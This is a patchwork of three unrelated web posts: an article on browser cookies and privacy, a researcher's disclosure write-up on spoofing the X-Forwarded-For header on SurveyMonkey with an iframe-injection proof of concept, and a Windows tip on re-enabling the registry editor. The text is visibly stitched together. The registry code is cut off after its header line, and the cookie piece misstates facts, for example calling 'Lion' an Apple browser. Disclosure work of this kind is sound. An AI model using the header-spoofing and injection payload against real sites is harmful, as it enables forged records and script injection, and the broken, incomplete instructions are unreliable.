For example, third party cookies are now something that all internet users should be aware. Third party cookies have introduced the idea of behavioral targeting, by allowing different sites to share the stored information from cookies.
For instance, when users are researching Barrack Obama on one site, and then they visit another site and an ad pops up selling a Barrack Obama biography, they have been the victim of a third party cookie.

The easiest way to get rid of cookies and prevent behavioral targeting is to delete the cookies currently on your personal computer.

Cookies are essentially just a text file that is stored so deleting them is pretty simple. They do not have the same properties as viruses so they do not replicate themselves, however some new types of cookies do have the ability to fight against being deleted.
Flash cookies for instance, have the ability to spawn new cookies once deleted without the user ever knowing. Ultimately, the most effective way to minimize cookies on your personal computer is through the settings in your internet browser.
By selecting the option to “disable cookies completely,” a person can rid their personal computer of cookies. However, this also eliminates the positives of cookies, such as remembering user names and passwords.


-Enabling cookies makes surfing the web much easier and provides a more satisfying user experience. Cookies help to eliminate the process of repeatedly inputting information to websites that a user frequently visits.

-At the same time these cookies are monitoring the activities and interests of individual users. Also, personal information such as an address or phone number can be stored and shared through cookies.

-Restrictions on cookies have not gone unchallenged. The Internet Advertising Bureau, which generated ad spending of about $20.12 billion in 2010, contends that they would not survive with a prior consent rule set in place.

-Other websites such as facebook.com, google.com, and amazon.com contend that a prior consent rule would be costly and disruptive “to the detriment of website users.”

Key Findings

-Cookies are continuously being developed and altered to more effectively track the activities of individual internet users. Flash cookies make deleting cookies off your computer more difficult while third party cookies are shared amongst different advertising websites to more effectively appeal to a person’s interests.

-Currently cookies are a hot button issue. Most of the major web browsers such as Firefox and Internet Explorer are in the process of developing a regulated “do not track” tool.

-The European Union is also working on a mandate that would force web browsers to obtain consent before tracking users through cookies. This however is currently still in the court systems due to different countries interpreting the laws differently. The debate is over whether internet users should have to opt in (agree to cookies) or opt out (deny them.)


-Enable the “disable cookies completely” option for your web browser. Doing so will eliminate cookies from your personal computer and keep your personal information private.

This will require you to repeatedly enter user names and passwords, but ultimately those extra few seconds are not as important as keeping your personal information private.

-Educate yourself with the current state of cookies. Currently the issue of cookies and internet privacy is up for debate amongst all of the major web browsers. By staying up to date you can ensure that you will not fall victim to the latest version of cookies.

-Know your web browser. Get familiar with its options and capabilities. Apple’s newest web browser, Lion, which will be released this summer will have a “do not track” privacy tool. Internet Explorer and Firefox on the other hand, are still implementing a similar option.

Source: https://www.infosecisland.com/blogview/13304-Cookies-and-Your-Privacy-Past-Present-and-Future.html

SurveyMonkey: IP Spoofing

When somebody fills out a survey on the Surveymonkey website, they record a number of pieces of meta data along with the survey answers. Things like data, time, link used to access the survey, and the IP Address of the personal completing the survey. This final piece of data was the one that really caught my attention, especially when I started seeing a number of RFC1918 addresses in with the mix. That’s a bit weird… why, and more interestingly, how are they getting these local addresses.
A lot of thoughts went through my mind… client-side java checking for local address maybe… something like decloak. Still, that wouldn’t account for the fact that only occasional responses had the private address, when others had the public address (about 5-6 in the 100 responses I looked at).
So, firing up Burp Suite, I threw a couple of fake survey responses through to Surveymonkey for testing and quickly found that remote system was picking up the public internet routable address on all my test responses. No funky JavaScript, no Java (at all), so it must be something in the request from the client to the server. Taking a look at the various options I started playing about with the X-Forwarded-For and X-Real-IP request headers and quickly discovered that by setting an X-Forwarded-For header on the survey traffic I could set any IP address I wanted on the response.
host: surveymonkey.com
User-Agent: Mozilla/5.0
Well that’s a bit of fun… I can set RFC1918 addresses… how totally fun, and at the same time useless as well. So taking this one step further, I thought, What would be possible with this. I can spoof the IP address of a person filling out a survey. Well, maybe I could specify a public IP address other than my own in this header too. If they’re not checking the string, maybe I can spoof a survey response from somebody who didn’t fill it out. Not really BIG impact, but if I fill out an anti-government survey from a Whitehouse IP address, I’m sure it’ll cause a bit of a stur. So, lets see if I can fill out this survey from China… after all, if the IP says China, it must be them right ;)
OMG… China are all up in my survey, APTing me! ( is one of the IP ranges assigned to China). Still aside from framing nation states for filling in nasty comments on your surveys, what else can you do with this?
I’m so glad you asked. Well, just because the X-Forwarded-For header is meant for transporting IP addresses of the client, doesn’t mean that’s what we’re going to put in there!
The IP address is returned to the owner of the survey, and as such, is only viewable by authenticated users. I’m sure there are also places where this IP address are returned to administrators, support staff, etc… but that’s not something I was able to check. So, how about we put in something other than an IP address. Something simple to prove the point… some kind of alert box maybe.
Well, no. Not because it’s filtered though. In the case of the Surveymonkey, the returned data is filtered to 20 characters. Anything longer is stripped. So anything flashy is pretty much out of question. Actually, almost anything interesting is out of scope, unless you happen to own a domain name that’s 5 characters long (in total). Sadly, I only own a domain that’s 6 characters (c22.cc) which is a pity.
Still, I threw together a quick PoC that triggers an iFrame from another site. An attacker (given a suitable domain name) could use this to load Javascript using script src instead of iframe src. Not really the kind of PoC I was hoping for, but it proves the point I guess.
host: surveymonkey.com
User-Agent: Mozilla/5.0
X-Forwarded-For: <iframe src=//aa.bb>
I contacted Surveymonkey with the information discovered and they’ve begun looking into correcting the issue. The question that really interests me is, how many other sites are using the same system and trusting user provided headers. This is something that webapp testers “should” be testing for. Still, there are lots of things that testers “should” be doing!

How to Enable Registry disabled by Administrator

What is Registry?
The Windows Registry is a hierarchical database that stores configuration settings and options on Microsoft Windows operating systems. It contains settings for low-level operating system components as well as the applications running on the platform: the kernel, device drivers, services, SAM, user interface and third party applications all make use of the registry. The registry also provides a means to access counters for profiling system performance.
I know most of you know that registry is called the "BRAIN OF WINDOWS" which store all the information in form of registry keys or technically we call them DWORD or STRING or BINARY or MULTI-STRING values which stores the data into the data in the form the name suggests.

How to enable the Registry disabled by Administrator?
The following message usually displayed when your system is infected by some virus that changes the registry value and hence you get an error message displaying " Registry is disable by Admin". So to fix it you also have to edit the registry but since your registry has been disabled so you cannot directly access it. For this you need to create one registry file that will update the dword value into the registry database.

Steps to enable registry:
1. Open the Notepad.
2. Copy the below code and paste into the notepad.

Windows Registry Editor Version 5.00

3. Now save the Notepad file as "anything.reg"(without quotes) and remember to select the file type as all files while saving otherwise you will not been able to execute it.

4. Now Close the file and open by double click on file and then click ok.

How to Do it using GPEDIT.MSC
Just follow this:
Start -> Run -> gpedit.msc -> User Configuration -> Administrative Templates -> System -> Prevent access to registry editing tools -> Right Click Properties -> Disabled